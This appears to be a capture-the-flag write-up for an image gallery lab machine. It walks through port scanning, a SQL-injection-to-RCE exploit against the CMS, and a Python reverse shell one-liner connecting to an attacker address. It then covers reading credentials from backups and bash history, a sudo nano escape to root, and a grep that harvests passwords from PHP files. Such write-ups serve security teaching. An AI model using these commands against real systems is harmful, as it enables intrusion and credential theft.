Try to exploit our image gallery system
nmap -sV -sC -p- 10.10.238.191
We will use dirsearch on the ports to determine which directories are present.
dirsearch -u 10.10.238.191
dirsearch -u 10.10.238.191:8080
The /login.php page takes us to an authentication for which we do not know the credentials.
On the other hand, we can see the CMS that is used. The landing page also gives us the version of the CMS. v1.0
A Google search gives us an exploit available for this CMS. This is an RCE following a bypass of authentication via a SQLi. https://www.exploit-db.com/exploits/50214
You must download the exploit and/or save it in .py format. Then run it with the following command :
On TARGET= you must put the address of the cms.http://10.10.238.191:8080/
Once the exploit is executed, you must use the address provided by the exploit. From there, it is possible to place system commands as well as a One liner reverse shell.
Python is installed on the system. We can therefore use it to recover a reverse shell.
python3.6 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.11.38.124”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
Command with URL :
After upgrading the shell, you must switch to the user Mike. For this, with the help of linpeas.sh, we find in /var/backups/mike_home_backup/ Mike’s identifiers.
password : the one found in bash_history
Once on Mike’s account, you have to do sudo -l . This allows you to see what the user’s privileges are.
Mike has sudo rights to run the rootkit.sh application. It is quite possible that one can by this means, to pass root. Before executing it, you have to see what is in the script.
It is possible to do several things with this script. Check the version, do an update but also read the report with the read option which will open the report.txt file with nano.
Since the command will be launched with sudo rights, it will be possible once the file is opened with nano, to exit nano with a root shell. All this is shown on the well-known site https://gtfobins.github.io/gtfobins/nano/#sudo
sudo /bin/bash /opt/rootkit.sh
It is possible to have this error: Error opening terminal: unknown.
To avoid this error, run this command :
Once the report is opened with nano, you must run these commands:
crtl + r puis ctrl x
This allows you to execute system commands. Then you have to put your last two commands to become root.
reset ; sh 1>&0 2>&0
find / -maxdepth 8 -name *.php -type f 2>/dev/null | xargs grep -C 20 -i pass
To learn more about the find command for can watch this article.
Once the identifiers have been retrieved, you must connect to the mysql server
mysql -u gallery_user -p
Then you have to do these commands :
select * from users;
That’s all folks
Thank you for taking the trouble to come to the site to read this Write Up
I hope he has more of you and that he taught you new things.
Feel free to leave a comment or share this article.